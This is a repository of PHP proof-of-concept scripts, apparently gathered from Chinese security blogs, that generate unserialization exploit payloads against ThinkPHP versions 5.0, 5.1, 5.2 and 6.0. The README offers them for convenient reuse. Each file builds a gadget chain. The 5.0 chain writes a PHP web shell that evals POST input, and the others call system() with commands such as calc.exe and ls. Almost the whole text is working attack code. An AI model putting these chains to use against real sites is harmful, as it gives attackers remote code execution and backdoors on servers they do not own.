├── README.md
└── ThinkPHP-Unserialize-Collection
    ├── 5.0.php
    ├── 5.1.php
    ├── 5.2.php
    └── 6.0.php


/README.md:
--------------------------------------------------------------------------------
1 | # ThinkPHP-Unserialize-Collection
2 | ThinkPHP各版本反序列化利用代码
3 | 
4 | 代码有的是自己改的有的是网上搜集的，放在这儿方便大家取用  
5 | 相关的代码的来源/参考链接放在代码注释里面了
6 | 


--------------------------------------------------------------------------------
/ThinkPHP-Unserialize-Collection/5.0.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //参考https://drivertom.blogspot.com/2020/01/thinkphp-v50x-pop-chainpoc.html
 3 | //Windows兼容性问题解决参考:https://xz.aliyun.com/t/7457#toc-3
 4 | //运行后生成a.php6218150bbcad1e6eec78da4604c4b6c7.php 其中包含了一个eval($_POST['ccc'])
 5 | //File类
 6 | namespace think\cache\driver;
 7 | class File
 8 | {
 9 |     protected $tag='sodayo';
10 |     protected $options = [
11 |         'expire'        => 0,
12 |         'cache_subdir'  => false,
13 |         'prefix'        => false,
14 |         'path'          => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php', //这里是欲写入的PHP被rot13后的结果
15 |         'data_compress' => false,
16 |     ];
17 | }
18 | 
19 | 
20 | //Memcached类
21 | namespace think\session\driver;
22 | use think\cache\driver\File;
23 | class Memcached
24 | {
25 |     protected $handler;
26 |     function __construct()
27 |     {
28 |         $this->handler=new File();
29 |     }
30 | }
31 | 
32 | 
33 | //Output类
34 | namespace think\console;
35 | use think\session\driver\Memcached;
36 | class Output
37 | {
38 |     protected $styles = ['removeWhereField'];
39 |     function __construct()
40 |     {
41 |         $this->handle=new Memcached();
42 |     }
43 | }
44 | //HasOne类
45 | namespace think\model\relation;
46 | use think\console\Output;
47 | class HasOne
48 | {
49 |     //protected $foreignKey="sss"; //$this->query->removeWhereField($this->foreignKey)
50 |     function __construct()
51 |     {
52 |         $this->query=new Output();
53 |     }
54 | }
55 | 
56 | 
57 | //Pivot类
58 | namespace think\model;
59 | use think\model\relation\HasOne;
60 | class Pivot
61 | {
62 |     protected $append = ['getError'];
63 |     public function __construct()
64 |     {
65 |         $this->error=new HasOne();
66 |     }
67 | }
68 | //Windows类
69 | namespace think\process\pipes;
70 | use think\model\Pivot;
71 | class Windows
72 | {
73 |     public function __construct()
74 |     {
75 |         $this->files=[new Pivot()];
76 |     }
77 | }
78 | $x=new Windows();
79 | 
80 | echo urlencode(serialize($x));


--------------------------------------------------------------------------------
/ThinkPHP-Unserialize-Collection/5.1.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //https://xz.aliyun.com/t/6619#toc-1
 3 | namespace think;
 4 | abstract class Model{
 5 |     protected $append = [];
 6 |     private $data = [];
 7 |     function __construct(){
 8 |         $this->append = ["lin"=>["calc.exe","calc"]]; //参数？
 9 |         $this->data = ["lin"=>new Request()];
10 |     }
11 | }
12 | class Request
13 | {
14 |     protected $hook = [];
15 |     protected $filter = "system";
16 |     protected $config = [
17 |         // 表单ajax伪装变量
18 |         'var_ajax'         => '_ajax',  
19 |     ];
20 |     function __construct(){
21 |         $this->filter = "system"; //执行的函数
22 |         $this->config = ["var_ajax"=>'lin'];
23 |         $this->hook = ["visible"=>[$this,"isAjax"]];
24 |     }
25 | }
26 | 
27 | 
28 | namespace think\process\pipes;
29 | 
30 | use think\model\concern\Conversion;
31 | use think\model\Pivot;
32 | class Windows
33 | {
34 |     private $files = [];
35 | 
36 |     public function __construct()
37 |     {
38 |         $this->files=[new Pivot()];
39 |     }
40 | }
41 | namespace think\model;
42 | 
43 | use think\Model;
44 | 
45 | class Pivot extends Model
46 | {
47 | }
48 | use think\process\pipes\Windows;
49 | echo urlencode(serialize(new Windows()));
50 | ?>


--------------------------------------------------------------------------------
/ThinkPHP-Unserialize-Collection/5.2.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //https://xz.aliyun.com/t/6619#toc-2
 3 | namespace think\process\pipes {
 4 |     class Windows
 5 |     {
 6 |         private $files;
 7 |         public function __construct($files)
 8 |         {
 9 |             $this->files = [$files];
10 |         }
11 |     }
12 | }
13 | 
14 | namespace think\model\concern {
15 |     trait Conversion
16 |     {    
17 |     }
18 | 
19 |     trait Attribute
20 |     {
21 |         private $data;
22 |         private $withAttr = ["lin" => "system"]; //函数
23 | 
24 |         public function get()
25 |         {
26 |             $this->data = ["lin" => "ls"]; //参数
27 |         }
28 |     }
29 | }
30 | 
31 | namespace think {
32 |     abstract class Model
33 |     {
34 |         use model\concern\Attribute;
35 |         use model\concern\Conversion;
36 |     }
37 | }
38 | 
39 | namespace think\model{
40 |     use think\Model;
41 |     class Pivot extends Model
42 |     {
43 |         public function __construct()
44 |         {
45 |             $this->get();
46 |         }
47 |     }
48 | }
49 | 
50 | namespace {
51 | 
52 |     $conver = new think\model\Pivot();
53 |     $payload = new think\process\pipes\Windows($conver);
54 |     echo urlencode(serialize($payload));
55 | }
56 | ?>


--------------------------------------------------------------------------------
/ThinkPHP-Unserialize-Collection/6.0.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //https://www.freebuf.com/articles/web/221939.html
 3 | namespace think\model\concern;
 4 | trait Conversion
 5 | {
 6 | }
 7 | 
 8 | trait Attribute
 9 | {
10 |     private $data;
11 |     private $withAttr = ["axin" => "system"]; //函数
12 | 
13 |     public function get()
14 |     {
15 |         $this->data = ["axin" => "ls"];  //参数
16 |     }
17 | }
18 | 
19 | namespace think;
20 | abstract class Model{
21 |     use model\concern\Attribute;
22 |     use model\concern\Conversion;
23 |     private $lazySave = false;
24 |     protected $withEvent = false;
25 |     private $exists = true;
26 |     private $force = true;
27 |     protected $field = [];
28 |     protected $schema = [];
29 |     protected $connection='mysql';
30 |     protected $name;
31 |     protected $suffix = '';
32 |     function __construct(){
33 |         $this->get();
34 |         $this->lazySave = true;
35 |         $this->withEvent = false;
36 |         $this->exists = true;
37 |         $this->force = true;
38 |         $this->field = [];
39 |         $this->schema = [];
40 |         $this->connection = 'mysql';
41 |     }
42 | 
43 | }
44 | 
45 | namespace think\model;
46 | 
47 | use think\Model;
48 | 
49 | class Pivot extends Model
50 | {
51 |     function __construct($obj='')
52 |     {
53 |         parent::__construct();
54 |         $this->name = $obj;
55 |     }
56 | }
57 | $a = new Pivot();
58 | $b = new Pivot($a);
59 | 
60 | echo urlencode(serialize($b));


--------------------------------------------------------------------------------